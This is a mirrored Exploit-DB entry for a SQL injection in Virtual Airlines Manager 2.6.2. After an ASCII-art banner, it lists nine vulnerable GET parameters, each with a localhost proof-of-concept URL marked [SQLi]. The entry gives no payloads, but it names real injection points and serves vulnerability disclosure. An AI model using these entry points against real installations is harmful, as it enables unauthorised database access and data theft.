bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/48567.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

64 lines
No EOL
2.6 KiB
Text
Raw Blame History

# Exploit Title: Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection
# Google Dork: N/A
# Date: 2020-06-08
# Exploit Author: Kostadin Tonev
# Vendor Homepage: http://virtualairlinesmanager.net
# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/
# Version: 2.6.2
# Tested on: Linux Mint
# CVE : N/A
. . . . . . . . . + .
. . : . .. :. .___---------___.
. . . . :.:. _".^ .^ ^. '.. :"-_. .
. : . . .:../: . .^ :.:\.
. . :: +. :.:/: . . . . . .:\
. : . . _ :::/: . ^ . . .:\
.. . . . - : :.:./. . .:\
. . . :..|: . . ^. .:|
. . : : ..|| . . . !:|
. . . . ::. ::\( . :)/
. . : . : .:.|. ###### .#######::|
:.. . :- : .: ::|.####### ..########:|
. . . .. . .. :\ ######## :######## :/
. .+ :: : -.:\ ######## . ########.:/
. .+ . . . . :.:\. ####### #######..:/
:: . . . . ::.:..:.\ . . ..:/
. . . .. : -::::.\. | | . .:/
. : . . .-:.":.::.\ ..:/
. -. . . . .: .:::.:.\. .:/
. . . : : ....::_:..:\ ___. :/
. . . .:. .. . .: :.:.:\ :/
+ . . : . ::. :.:. .:.|\ .:/|
. + . . ...:: ..| --.:|
. . . . . . . ... :..:.."( ..)"
. . . : . .: ::/ . .::\
[1] Vulnerable GET parameter: notam_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi]
[2] Vulnerable GET parameter: airport=[SQLi]
[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]
[3] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]
[4] Vulnerable GET parameter: plane_location=[SQLi]
[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]
[5] Vulnerable GET parameter: hub_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]
[6] Vulnerable GET parameter: pilot_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]
[7] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]
[8] Vulnerable GET parameter: event_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]
[9] Vulnerable GET parameter: tour_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]
Reference in a new issue View git blame Copy permalink